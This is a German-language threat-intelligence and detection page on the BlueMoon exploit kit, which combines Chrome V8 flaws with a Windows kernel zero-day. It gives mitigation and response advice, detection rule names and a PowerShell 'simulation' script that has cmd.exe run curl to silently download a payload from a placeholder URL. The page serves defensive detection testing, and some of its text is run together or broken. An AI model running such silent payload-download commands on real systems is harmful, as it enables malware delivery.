Chrome- und Windows-Zero-Days fördern schnelle Übernahme durch staatlich ausgerichtete Bedrohungsakteure
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Mehrere auf Spionage fokussierte Bedrohungsakteure haben das BlueMoon Exploit Kit übernommen, das Chrome V8-Schwachstellen mit einem Windows Kernel LPE Zero-Day kombiniert. Die Kampagne zeigt eine schnelle operative Anpassung und könnte KI-unterstützte Exploit-Entwicklung beinhalten. Mehrere Akteure, vorwiegend mit vermuteter Verbindung zu China, verwenden das Kit, um verschiedene Payloads bereitzustellen, darunter bösartige Browser-Erweiterungen und Hintertüren.
Untersuchung
Proofpoint identifizierte vier unterschiedliche Bedrohungscluster, die das BlueMoon Kit verwenden und ähnliche Orchestrierungs- und Lademethoden beobachten, trotz Unterschiede in der Verpackung. Die Untersuchung hob die Ausnutzung von Patch-Gap-Schwachstellen und Post-Exploitation-Verhalten wie DLL-Sideloading und Installation bösartiger Browser-Erweiterungen hervor. Die technische Analyse deckte auch umfangreiche Diagnoseprotokollierung und Markierung von Übergabedateien auf, die möglicherweise auf eine KI-unterstützte Entwicklung hinweisen.
Minderung
Benutzer sollten sicherstellen, dass Chrome und andere auf Chromium basierende Browser auf die neuesten stabilen Versionen aktualisiert werden, um die V8-Schwachstellen zu beheben. Organisationen sollten auch die Windows-Aktualisierung priorisieren, um die Gefährdung durch die Kernel-LPE-Schwachstelle zu verringern. Die Überwachung verdächtiger Prozessbäume, einschließlich chrome.exe Auslösung cmd.exe or curl.exe, und die Überprüfung geplanter Aufgaben auf ungewöhnliche Namen werden empfohlen.
Antwort
Wenn eine BlueMoon-Ausnutzung erkannt wird, sollten betroffene Endpunkte sofort isoliert werden, um weitere laterale Bewegungen oder Datendiebstahl zu verhindern. Die Reaktionskräfte sollten Gedächtnisforensik anwenden, um reflexiv geladene DLLs zu identifizieren und Systeme auf nicht autorisierte Browser-Erweiterungen zu überprüfen. Sicherheitsteams sollten auch nach Persistenzmechanismen suchen, insbesondere verdächtige geplante Aufgaben und Registrierungsänderungen im CLSID-Hive.
Angriffsablauf
Wir aktualisieren diesen Teil noch.
Erkennungen
Verdächtige CURL-Verwendung (über cmdline)
Verdächtige Dateien im öffentlichen Benutzerprofil (über file_event)
Möglicher Missbrauch von Cloudflare-Entwicklungsdomains (über dns)
Möglicher Kommunikationsversuch von IP-Nachschlage-Domains (über dns)
Verdächtige Command-and-Control durch ungewöhnliche Top-Level-Domain (TLD) DNS-Anfrage (über dns)
IOCs (HashSha256) zum Erkennen: Einmal im BlueMoon: Mehrere staatlich ausgerichtete Bedrohungsakteure übernehmen schnell neuartige Exploit-Kette unter Verwendung von Chrome- und Windows-Zero-Days
IOCs (SourceIP) zum Erkennen: Einmal im BlueMoon: Mehrere staatlich ausgerichtete Bedrohungsakteure übernehmen schnell neuartige Exploit-Kette unter Verwendung von Chrome- und Windows-Zero-Days
IOCs (DestinationIP) zum Erkennen: Einmal im BlueMoon: Mehrere staatlich ausgerichtete Bedrohungsakteure übernehmen schnell neuartige Exploit-Kette unter Verwendung von Chrome- und Windows-Zero-Days
Erkennung der BlueMoon-Exploit-Kette über Chrome-zu-CMD-und-CURL-Ausführung [Windows-Prozesserstellung]
Simulation-Ausführung
-
Angriffserzählung & Befehle: Der Angreifer zielt auf einen Benutzer ab, der im Internet surft. Durch das Ausnutzen einer Schwachstelle in Chrome zwingt der Angreifer den Browser, eine Kommandozeilenshell zu starten. Um den Fußabdruck zu minimieren und das Herunterladen großer Dateien direkt über den Browser zu vermeiden, verwendet der Angreifer
cmd.exeumcurlaufzurufen. Der Befehl verwendet speziell die-sS -oFlags, um eine Nutzlast mit dem Namenmsgbox.exevon einem entfernten Server leise herunterzuladen, was das Verhalten des BlueMoon-Exploits simuliert. -
Regressionstestskript:
# Simulation der BlueMoon-Exploit-Kette # Schritt 1: Simulieren Sie, dass Chrome der übergeordnete Prozess ist (wir verwenden bei Bedarf einen PowerShell-Wrapper, um den PID/Prozessbaum zu simulieren, # aber für einen direkten Test lösen wir das Kommandozeilenmuster aus). $SimulatedPayloadUrl = "https://raw.githubusercontent.com/example/payload/main/msgbox.exe" $TargetDir = "$env:TEMPmsgbox.exe" Write-Host "[!] BlueMoon-Simulation startet..." # Um sicherzustellen, dass die Erkennung auslöst, müssen wir die Kommandozeile genau so nachahmen, wie sie in der Sigma-Regel definiert ist. # Hinweis: In einer realen Umgebung wäre chrome.exe der Vorgänger. # Für dieses Skript führen wir den Befehl aus, nach dem die Regel sucht. Start-Process "cmd.exe" -ArgumentList "/c curl -sS -o $TargetDir $SimulatedPayloadUrl" -Wait Write-Host "[+] Simulation abgeschlossen. Überprüfen Sie SIEM auf Erkennung." -
Aufräumungsbefehle:
# Entfernen Sie die simulierte Nutzlast Remove-Item -Path "$env:TEMPmsgbox.exe" -ErrorAction SilentlyContinue Write-Host "[+] Aufräumung abgeschlossen."